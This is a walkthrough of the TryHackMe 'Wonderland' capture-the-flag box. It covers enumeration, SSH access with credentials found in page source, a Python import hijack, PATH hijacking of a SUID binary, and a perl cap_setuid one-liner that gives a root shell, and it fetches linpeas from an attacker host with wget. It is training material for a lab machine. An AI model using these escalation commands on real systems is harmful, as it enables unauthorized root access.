Wonderland - TryHackMe

Wonderland is a medium difficulty box on TryHackMe. Below are the steps taken to fully compromise this box.

First, let’s run threader3000 to see what ports are open.

Wonderland threader3000

This shows that two ports are open, 22 and 80. Let’s run nmap -A -p 22,80 [machine ip] and see what information we are able to enumerate from this scan.

Wonderland nmap

It appears that Goland is used as the web server. Visiting the website we see a picture of a white rabbit.

Wonderland website

However, there is nothing in the source code to see. Let’s run gobuster dir -u http://[machine ip] -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 50 and see if we are able to locate any other directories.

Wonderland gobuster 1

gobuster returned a couple of results to review. the /poem subdirectory just had the poem, The Jabberwocky on it. /r told you to keep on going.

Wonderland /r

At this point, I ran gobuster dir -u http://[machine ip]/r/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 50, and it returned a subdirectory of /a

Wonderland gobuster2

At this point, I remember it stated to follow the White Rabbit, and since /r/a were the beginning of rabbit, I decided to try going to http://[machine ip]/r/a/b/b/i/t This leads to a page telling you to enter wonderland, but nothing is clickable on the page.

Wonderland /r/a/b/b/i/t

I decided to take a look at the source code for the page, and it appears that there were potentially a set of hidden credentials that might be useable to SSH into the server.

Wonderland alice credentials

Let’s try to ssh into the victim with ssh alice@[machine ip].

Wonderland alice ssh

Success! We were able to connect via ssh as alice. Let’s take a look around. ls -al shows that root.txt is in this folder, but we cannot read it. Running python3 walrus_and_the_carpenter.py just returns 10 random lines of text from the script.

Wonderland alice home directory

Since root.txt is in the user folder, let’s see if the user flag is in the root folder with cat /root/user.txt. We’ve found the user flag!

Wonderland user.txt

Let’s run sudo -l and see if alice can run something as a different user. We can see that she can run python 3.6 as another user, rabbit.

Wonderland alice sudo -l

It appears that we can open python 3.6 as rabbit by running the walrus_and_the_carpenter.py script. Let’s take a look at that script first.

Wonderland walrus_and_the_carpenter.py

With python, if you name a file with the same name as something that is imported in the same directory, it will import that file instead of the module. Let’s create a script file with nano random.py and put in the code below.

Wonderland random.py

Save this file and then run sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py. You should now have a shell as rabbit.

Wonderland rabbit

I attempted to run sudo -l as rabbit, but we do not have this user’s password to see what permissions they might potentially have. I navigated to rabbit’s home folder with cd /home/rabbit and ran ls -al to list the directory’s contents.

Wonderland rabbit home directory

It appears that there is a SUID file in this folder. Let’s run it and see what happens.

Wonderland teaParty

At this point you can enter whatever you would like, and the program crashes. It also appears to display some text with time an hour ahead of the current time. Since we likely do not have any tools on this machine for analyzing the binary, let’s run nano teaParty to see if we can find anything useful in the file. We can see that the date binary is called without an absolute path, let’s use that to our advantage.

Wonderland nano teaParty

Let’s add /tmp to rabbit’s $PATH variable with export PATH="/tmp:$PATH". This will put /tmp as the first folder that is looked at for binaries that do not have an absolute path defined.

Wonderland $PATH

Next, run cd /tmp followed by nano date. Put in the two lines of codes below which can be used to launch a bash shell.

Wonderland /tmp/date bash shell

Save and exit nano, and then run cd /home/rabbit, and run chmod +x /tmp/date to make the date file executable. Now, execute ./teaParty. This should give you a shell as hatter!

Wonderland hatter shell access

Next, let’s navigate to hatter’s home directory with cd /home/hatter and run ls -al. There is a password.txt file there. Let’s run cat password.txt.

Wonderland hatter password.txt

In another terminal window on your attacker pc, run **ssh hatter@[machine ip] ** and use the password you just uncovered. You should be able to connect as hatter.

Wonderland hatter ssh

hatter is not able to run sudo -l, so I next decided to enumerate with linpeas. On my attacker computer, I ran python3 -m http.server to spin up a temporary http server.

Wonderland python3 http server

Next, I ran wget http://[attacker ip]:8000/linpeas.sh to download it locally onto the victim computer. I then ran chmod +x linpeas.sh to make it executable followed by ./linpeas.sh

Wonderland linpeas

In the middle of enumeration, it shows that perl has the cap_setuid+ep capability. This can be used to gain a root shell. Let’s take a look at GTFOBins to find a way to escalate to root. It appears you can run perl -e ‘use POSIX qw(setuid); POSIX::setuid(0); exec “/bin/sh”;’ to gain a root shell. Let’s give it a try.

Wonderland root shell

Awesome, now we just need to run cat /home/alice/root.txt to get the root flag!

Wonderland root.txt